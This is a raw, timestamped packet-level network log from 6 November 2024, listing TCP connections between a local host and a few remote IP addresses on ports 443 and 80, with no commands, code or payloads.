Nov 6, 2024 17:02:43.993181944 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.995467901 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.995485067 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.996377945 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.996407986 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.996463060 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.996575117 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.996583939 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.997929096 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.997951031 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:43.998013020 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.998585939 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:43.998599052 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.188885927 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:44.283797026 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:44.283828020 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:44.285903931 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:44.292504072 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:44.292521954 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:44.333549976 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:44.721087933 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.733800888 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.733921051 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.735366106 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.739598989 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.744342089 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.744363070 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.745044947 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.745050907 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.745357990 CET	56823	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.745392084 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.745708942 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.745726109 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.745949984 CET	56823	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.745955944 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.746118069 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.746123075 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.746352911 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.746371031 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.746803045 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.746809006 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.765119076 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.765130043 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.765558958 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.765566111 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.870961905 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.871243954 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.871324062 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.871575117 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.871577024 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.871596098 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.871617079 CET	56826	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.871623993 CET	443	56826	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.871686935 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.871819973 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.872653961 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.872673988 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.872674942 CET	56822	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.872682095 CET	443	56822	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.875642061 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.875673056 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.875777960 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.875818014 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.875821114 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.876005888 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.876146078 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.876159906 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.876451015 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.876461983 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.878789902 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.878844976 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.878886938 CET	56823	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.879060030 CET	56823	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.879070044 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.879085064 CET	56823	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.879090071 CET	443	56823	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.882637978 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.882658005 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.882716894 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.882962942 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.882972002 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.891405106 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.892852068 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.893107891 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.893178940 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.893230915 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.893239975 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.893251896 CET	56825	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.893255949 CET	443	56825	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.895175934 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.895431995 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.895462990 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.895467997 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.895525932 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.895534992 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.895534992 CET	56824	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.895551920 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.895565033 CET	443	56824	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.895687103 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.895701885 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.897578001 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.897600889 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.897694111 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.897855997 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:44.897870064 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:44.915579081 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:44.915632963 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:44.918226004 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:44.918234110 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:44.918518066 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:44.991698027 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:44.997354984 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:45.043324947 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:45.146477938 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:45.146563053 CET	443	56827	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:45.146660089 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:45.154351950 CET	56827	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:45.168216944 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:45.174536943 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:45.417886972 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:45.425494909 CET	56834	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:45.425565958 CET	443	56834	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:45.425676107 CET	56834	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:45.425966024 CET	56834	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:45.425976038 CET	443	56834	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:45.536539078 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:45.612862110 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.613099098 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.613399982 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.613420010 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.613790989 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.613837004 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.613925934 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.613930941 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.614487886 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.614494085 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.629131079 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.629698992 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.629718065 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.630202055 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.630209923 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.630403996 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.630733013 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.630754948 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.631320953 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.631328106 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.744184017 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.744260073 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.744314909 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.744358063 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.744421959 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.744466066 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.752552032 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.752573013 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.752583981 CET	56828	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.752590895 CET	443	56828	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.754009008 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.754044056 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.754060030 CET	56829	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.754070997 CET	443	56829	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.757370949 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.757405996 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.757477045 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.757971048 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.757982969 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.758341074 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.758378983 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.758459091 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.758567095 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.758577108 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.758909941 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.759319067 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.759412050 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.759429932 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.759429932 CET	56833	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.759440899 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.759448051 CET	443	56833	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.761723042 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.761745930 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.761811018 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.761985064 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.761996031 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.764756918 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.764817953 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.764934063 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.764966965 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.764966965 CET	56832	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.764978886 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.764990091 CET	443	56832	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.768033981 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.768069983 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.768285990 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.768634081 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.768654108 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.812522888 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.813050985 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.813069105 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.813527107 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.813532114 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.941401958 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.941579103 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.941891909 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.941924095 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.941936016 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.941947937 CET	56830	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.941958904 CET	443	56830	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.944520950 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.944545031 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:45.944606066 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.944737911 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:45.944749117 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.107009888 CET	443	56834	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:46.134644032 CET	56834	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:46.134685040 CET	443	56834	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:46.299411058 CET	443	56834	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:46.299520969 CET	443	56834	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:46.299568892 CET	56834	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:46.300065994 CET	56834	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:46.306965113 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.308110952 CET	56841	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.312840939 CET	80	56815	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:46.313016891 CET	80	56841	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:46.313066006 CET	56815	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.313096046 CET	56841	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.313200951 CET	56841	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.317982912 CET	80	56841	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:46.870966911 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.871431112 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.871457100 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.872118950 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.872123003 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.873171091 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.873652935 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.873951912 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.873975039 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.874424934 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.874429941 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.876316071 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.876338959 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.876696110 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.876699924 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.879797935 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.880141973 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.880157948 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.880187035 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.880729914 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.880743980 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.880799055 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.880804062 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.881222963 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.881230116 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.927608967 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.932863951 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:46.932974100 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.933151960 CET	56843	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:46.938247919 CET	80	56843	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:46.999613047 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.999671936 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.999870062 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.999907970 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.999926090 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:46.999938965 CET	56836	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:46.999943972 CET	443	56836	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.002479076 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.002521038 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.002588034 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.002708912 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.002722979 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.003277063 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.003407955 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.003468037 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.003492117 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.003503084 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.003514051 CET	56838	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.003516912 CET	443	56838	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.005474091 CET	56845	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.005503893 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.005567074 CET	56845	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.005683899 CET	56845	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.005693913 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.010313988 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.010445118 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.010508060 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.010539055 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.010539055 CET	56839	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.010555983 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.010564089 CET	443	56839	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.012346983 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.012617111 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.012629032 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.012696028 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.012799978 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.012810946 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.013025045 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.013086081 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.013221025 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.013221025 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.013272047 CET	56835	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.013288975 CET	443	56835	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.013561964 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.013879061 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.013905048 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.013910055 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.013917923 CET	56837	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.013922930 CET	443	56837	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.015332937 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.015355110 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.015444040 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.015547037 CET	56847	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.015556097 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.015691042 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.015737057 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.015793085 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.015913963 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.015940905 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.142118931 CET	80	56841	193.122.6.168	192.168.2.6
Nov 6, 2024 17:02:47.143615961 CET	56849	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:47.143631935 CET	443	56849	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:47.143728018 CET	56849	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:47.144133091 CET	56849	443	192.168.2.6	188.114.96.3
Nov 6, 2024 17:02:47.144143105 CET	443	56849	188.114.96.3	192.168.2.6
Nov 6, 2024 17:02:47.224067926 CET	56841	80	192.168.2.6	193.122.6.168
Nov 6, 2024 17:02:47.733419895 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.733875990 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.733911991 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.734335899 CET	56846	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.734339952 CET	443	56846	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.741933107 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.743027925 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.743390083 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.743396044 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.743798018 CET	56844	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.743802071 CET	443	56844	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.744003057 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.744040012 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.744381905 CET	56848	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:47.744389057 CET	443	56848	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.745594978 CET	443	56845	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.745640993 CET	443	56847	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:47.745937109 CET	56845	443	192.168.2.6	13.107.246.45
